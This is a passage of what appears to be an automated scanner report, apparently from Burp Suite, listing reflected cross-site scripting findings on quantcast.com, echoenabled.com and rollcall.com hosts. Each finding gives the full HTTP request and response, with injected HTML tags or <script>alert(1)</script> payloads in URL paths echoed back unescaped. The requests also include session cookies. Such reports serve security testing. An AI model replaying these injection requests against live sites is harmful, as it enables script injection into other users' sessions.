GET /js1cf42<a>c1a0ed6d243/concat.js?v=2011021312 HTTP/1.1 Host: ak.quantcast.com Proxy-Connection: keep-alive Referer: http://www.quantcast.com/top-sites-1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=27727020.780724242.1297445179.1297458290.1297473023.4; qcVisitor=2|97|1297445121784|21|NOTSET; __utma=14861494.2106100296.1296313950.1297527348.1297539959.9
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Vary: Accept-Encoding Date: Sun, 13 Feb 2011 01:11:06 GMT Connection: close Content-Length: 7759
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; cha ...[SNIP]... <em> js1cf42<a>c1a0ed6d243 concat.js</em> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72514"><a>fd638ed04c4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /js/concat.js72514"><a>fd638ed04c4?v=2011021312 HTTP/1.1 Host: ak.quantcast.com Proxy-Connection: keep-alive Referer: http://www.quantcast.com/top-sites-1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=27727020.780724242.1297445179.1297458290.1297473023.4; qcVisitor=2|97|1297445121784|21|NOTSET; __utma=14861494.2106100296.1296313950.1297527348.1297539959.9
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Vary: Accept-Encoding Date: Sun, 13 Feb 2011 01:11:09 GMT Connection: close Content-Length: 15253
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cc25"><a>38b52c7bf64 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /2cc25"><a>38b52c7bf64/themes/quantcast/images/find.png?jcb=1288642643 HTTP/1.1 Host: ak.quantcast.com Proxy-Connection: keep-alive Referer: http://www.quantcast.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=27727020.780724242.1297445179.1297458290.1297473023.4; qcVisitor=2|97|1297445121784|21|NOTSET; __utma=14861494.2106100296.1296313950.1297527348.1297539959.9
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Vary: Accept-Encoding Date: Sun, 13 Feb 2011 01:10:44 GMT Connection: close Content-Length: 17723
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 519ca"><a>3af54121990 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /519ca"><a>3af54121990/themes/quantcast/images/home_search_gradient.png?jcb=1288361934 HTTP/1.1 Host: ak.quantcast.com Proxy-Connection: keep-alive Referer: http://www.quantcast.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=27727020.780724242.1297445179.1297458290.1297473023.4; qcVisitor=2|97|1297445121784|21|NOTSET; __utma=14861494.2106100296.1296313950.1297527348.1297539959.9
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Vary: Accept-Encoding Date: Sun, 13 Feb 2011 01:10:41 GMT Connection: close Content-Length: 17819
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 645d4"><a>6c010025b92 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /645d4"><a>6c010025b92/themes/quantcast/images/sign_in.png?jcb=1288642643 HTTP/1.1 Host: ak.quantcast.com Proxy-Connection: keep-alive Referer: http://www.quantcast.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=27727020.780724242.1297445179.1297458290.1297473023.4; qcVisitor=2|97|1297445121784|21|NOTSET; __utma=14861494.2106100296.1296313950.1297527348.1297539959.9
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Vary: Accept-Encoding Date: Sun, 13 Feb 2011 01:10:43 GMT Connection: close Content-Length: 17741
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f2fa"><a>0d5a5d86ed1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /4f2fa"><a>0d5a5d86ed1/themes/quantcast/images/sociable_facebook.gif?jcb=1288361934 HTTP/1.1 Host: ak.quantcast.com Proxy-Connection: keep-alive Referer: http://www.quantcast.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=27727020.780724242.1297445179.1297458290.1297473023.4; qcVisitor=2|97|1297445121784|21|NOTSET; __utma=14861494.2106100296.1296313950.1297527348.1297539959.9
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Vary: Accept-Encoding Date: Sun, 13 Feb 2011 01:10:44 GMT Connection: close Content-Length: 17801
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5705"><a>26052ea36f9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /a5705"><a>26052ea36f9/themes/quantcast/images/sociable_follow.gif?jcb=1288361934 HTTP/1.1 Host: ak.quantcast.com Proxy-Connection: keep-alive Referer: http://www.quantcast.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=27727020.780724242.1297445179.1297458290.1297473023.4; qcVisitor=2|97|1297445121784|21|NOTSET; __utma=14861494.2106100296.1296313950.1297527348.1297539959.9
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Vary: Accept-Encoding Date: Sun, 13 Feb 2011 01:10:43 GMT Connection: close Content-Length: 17789
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f455f"><a>e45c460b85b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /f455f"><a>e45c460b85b/themes/quantcast/images/sociable_rss.gif?jcb=1288361934 HTTP/1.1 Host: ak.quantcast.com Proxy-Connection: keep-alive Referer: http://www.quantcast.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=27727020.780724242.1297445179.1297458290.1297473023.4; qcVisitor=2|97|1297445121784|21|NOTSET; __utma=14861494.2106100296.1296313950.1297527348.1297539959.9
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Vary: Accept-Encoding Date: Sun, 13 Feb 2011 01:10:42 GMT Connection: close Content-Length: 17771
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d063"><a>0c61679f0f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /3d063"><a>0c61679f0f5/themes/quantcast/images/sociable_twitter.gif?jcb=1288361934 HTTP/1.1 Host: ak.quantcast.com Proxy-Connection: keep-alive Referer: http://www.quantcast.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=27727020.780724242.1297445179.1297458290.1297473023.4; qcVisitor=2|97|1297445121784|21|NOTSET; __utma=14861494.2106100296.1296313950.1297527348.1297539959.9
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Vary: Accept-Encoding Date: Sun, 13 Feb 2011 01:10:42 GMT Connection: close Content-Length: 17795
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39bdf"><a>13860d90ae5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /39bdf"><a>13860d90ae5/themes/quantcast/images/sociable_youtube.gif?jcb=1288361934 HTTP/1.1 Host: ak.quantcast.com Proxy-Connection: keep-alive Referer: http://www.quantcast.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=27727020.780724242.1297445179.1297458290.1297473023.4; qcVisitor=2|97|1297445121784|21|NOTSET; __utma=14861494.2106100296.1296313950.1297527348.1297539959.9
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Vary: Accept-Encoding Date: Sun, 13 Feb 2011 01:10:42 GMT Connection: close Content-Length: 17795
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of the q request parameter is copied into the HTML document as plain text between tags. The payload a90be<a>bcb7b76ec90 was submitted in the q parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /v1/search?callback=jsonp1297694123687&q=childrenof%3Ahttp%3A%2F%2Fwww.aboutecho.com%2Fe2%2Ftweets%2Fe2launch+user.id%3Awww.twitter.com%2Fchrissaad%2Cwww.twitter.com%2Fcailloux2007%2Cwww.twitter.com%2Fwadcom%2Cwww.twitter.com%2Flevwalkin%2Cwww.twitter.com%2Fechoenabled%2Cwww.twitter.com%2Fechostatus%2Cwww.twitter.com%2Fkhrisloux+tags%3Aecho+-state%3ASystemFlagged%2CModeratorDeleted+children+-state%3ASystemFlagged%2CModeratorDeleted+sortOrder%3AreverseChronological+itemsPerPage%3A4+sanitizeHTML%3Afalse+a90be<a>bcb7b76ec90&since=1297696287.550508&appkey=prod.echocorp HTTP/1.1 Host: api.echoenabled.com Proxy-Connection: keep-alive Referer: http://aboutecho.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Server: Yaws/1.85 Yet Another Web Server Date: Mon, 14 Feb 2011 15:12:25 GMT Content-Length: 139 Content-Type: application/x-javascript; charset="utf-8"
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 88481<script>alert(1)</script>92322cffddd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /css88481<script>alert(1)</script>92322cffddd/advertising.css HTTP/1.1 Host: cdn.rollcall.com Proxy-Connection: keep-alive Referer: http://www.rollcall.com/news/-203351-1.html Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=ecjmlujo8iniv4b8dcvl4mm7a3
Response
HTTP/1.1 404 Not Found Date: Sun, 13 Feb 2011 01:13:57 GMT Server: PWS/1.7.1.2 X-Px: ms iad-agg-n22 ( origin) P3P: CP="CAO DSP NID CURa ADMa DEVa TAIi CONi OUR DELi SAMi IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml" Cache-Control: max-age=30 Expires: Sun, 13 Feb 2011 01:14:27 GMT Age: 0 Content-Length: 257 Content-Type: text/html; charset=ISO-8859-1 Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title></head><body> <h1>Not Found</h1> <p>The requested URL /css88481<script>alert(1)</script>92322cffddd/advertising.css was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e96f8<script>alert(1)</script>08f3bce704f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /csse96f8<script>alert(1)</script>08f3bce704f/article.css HTTP/1.1 Host: cdn.rollcall.com Proxy-Connection: keep-alive Referer: http://www.rollcall.com/news/-203351-1.html Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=ecjmlujo8iniv4b8dcvl4mm7a3
Response
HTTP/1.1 404 Not Found Date: Sun, 13 Feb 2011 01:13:55 GMT Server: PWS/1.7.1.2 X-Px: ms iad-agg-n22 ( iad-agg-n19), ms iad-agg-n19 ( origin) P3P: CP="CAO DSP NID CURa ADMa DEVa TAIi CONi OUR DELi SAMi IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml" Cache-Control: max-age=30 Expires: Sun, 13 Feb 2011 01:14:25 GMT Age: 0 Content-Length: 253 Content-Type: text/html; charset=ISO-8859-1 Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title></head><body> <h1>Not Found</h1> <p>The requested URL /csse96f8<script>alert(1)</script>08f3bce704f/article.css was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 45927<script>alert(1)</script>b484d9c859d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /css45927<script>alert(1)</script>b484d9c859d/boxes.css HTTP/1.1 Host: cdn.rollcall.com Proxy-Connection: keep-alive Referer: http://www.rollcall.com/news/-203351-1.html Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=ecjmlujo8iniv4b8dcvl4mm7a3
Response
HTTP/1.1 404 Not Found Date: Sun, 13 Feb 2011 01:13:54 GMT Server: PWS/1.7.1.2 X-Px: ms iad-agg-n22 ( iad-agg-n25), ms iad-agg-n25 ( origin) P3P: CP="CAO DSP NID CURa ADMa DEVa TAIi CONi OUR DELi SAMi IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml" Cache-Control: max-age=30 Expires: Sun, 13 Feb 2011 01:14:24 GMT Age: 0 Content-Length: 251 Content-Type: text/html; charset=ISO-8859-1 Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title></head><body> <h1>Not Found</h1> <p>The requested URL /css45927<script>alert(1)</script>b484d9c859d/boxes.css was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 699ae<script>alert(1)</script>e5787482e71 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /css699ae<script>alert(1)</script>e5787482e71/grid.css HTTP/1.1 Host: cdn.rollcall.com Proxy-Connection: keep-alive Referer: http://www.rollcall.com/news/-203351-1.html Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=ecjmlujo8iniv4b8dcvl4mm7a3
Response
HTTP/1.1 404 Not Found Date: Sun, 13 Feb 2011 01:13:53 GMT Server: PWS/1.7.1.2 X-Px: ms iad-agg-n22 ( iad-agg-n34), ms iad-agg-n34 ( origin) P3P: CP="CAO DSP NID CURa ADMa DEVa TAIi CONi OUR DELi SAMi IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml" Cache-Control: max-age=30 Expires: Sun, 13 Feb 2011 01:14:23 GMT Age: 0 Content-Length: 250 Content-Type: text/html; charset=ISO-8859-1 Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title></head><body> <h1>Not Found</h1> <p>The requested URL /css699ae<script>alert(1)</script>e5787482e71/grid.css was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cc415<script>alert(1)</script>6fd79fd852e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /csscc415<script>alert(1)</script>6fd79fd852e/landing.css HTTP/1.1 Host: cdn.rollcall.com Proxy-Connection: keep-alive Referer: http://www.rollcall.com/news/-203351-1.html Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=ecjmlujo8iniv4b8dcvl4mm7a3
Response
HTTP/1.1 404 Not Found Date: Sun, 13 Feb 2011 01:14:05 GMT Server: PWS/1.7.1.2 X-Px: ms iad-agg-n22 ( iad-agg-n27), ms iad-agg-n27 ( origin) P3P: CP="CAO DSP NID CURa ADMa DEVa TAIi CONi OUR DELi SAMi IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml" Cache-Control: max-age=30 Expires: Sun, 13 Feb 2011 01:14:35 GMT Age: 0 Content-Length: 253 Content-Type: text/html; charset=ISO-8859-1 Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title></head><body> <h1>Not Found</h1> <p>The requested URL /csscc415<script>alert(1)</script>6fd79fd852e/landing.css was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a4f8d<script>alert(1)</script>7e60525730 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cssa4f8d<script>alert(1)</script>7e60525730/navigation.css HTTP/1.1 Host: cdn.rollcall.com Proxy-Connection: keep-alive Referer: http://www.rollcall.com/news/-203351-1.html Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=ecjmlujo8iniv4b8dcvl4mm7a3
Response
HTTP/1.1 404 Not Found Date: Sun, 13 Feb 2011 01:13:57 GMT Server: PWS/1.7.1.2 X-Px: ms iad-agg-n22 ( iad-agg-n29), ms iad-agg-n29 ( origin) P3P: CP="CAO DSP NID CURa ADMa DEVa TAIi CONi OUR DELi SAMi IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml" Cache-Control: max-age=30 Expires: Sun, 13 Feb 2011 01:14:27 GMT Age: 0 Content-Length: 255 Content-Type: text/html; charset=ISO-8859-1 Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title></head><body> <h1>Not Found</h1> <p>The requested URL /cssa4f8d<script>alert(1)</script>7e60525730/navigation.css was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 50c4e<script>alert(1)</script>1209bdff379 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
